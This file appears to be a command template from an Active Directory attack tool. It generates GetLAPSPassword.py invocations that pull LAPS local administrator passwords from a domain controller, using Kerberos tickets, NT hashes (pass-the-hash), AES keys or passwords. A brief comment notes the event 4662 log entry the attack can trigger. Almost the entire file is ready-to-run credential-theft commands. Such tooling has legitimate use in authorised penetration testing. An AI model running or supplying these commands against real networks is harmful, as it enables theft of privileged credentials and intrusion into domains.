# Read LAPS passwords
# Executing the attack will generate a 4662 (An operation was performed on an object)
# event at the domain controller if an appropriate SACL is in place on the target object.
{% if parent.krb_auth %}
GetLAPSPassword.py '{{fqdn}}/{{parent.obj.name}}' -dc-ip {{dc_ip}} -k -no-pass
{%- elif parent.secret_type == T_SECRET_NTHASH %}
GetLAPSPassword.py '{{fqdn}}/{{parent.obj.name}}' -dc-ip {{dc_ip}} -hashes :{{parent.secret|red}}
{%- elif parent.secret_type == T_SECRET_AESKEY %}
GetLAPSPassword.py '{{fqdn}}/{{parent.obj.name}}' -dc-ip {{dc_ip}} -k -aesKey {{parent.secret|red}}
{%- elif parent.secret_type == T_SECRET_PASSWORD %}
GetLAPSPassword.py '{{fqdn}}/{{parent.obj.name}}:{{parent.secret|red}}' -dc-ip {{dc_ip}}
{%- endif %}
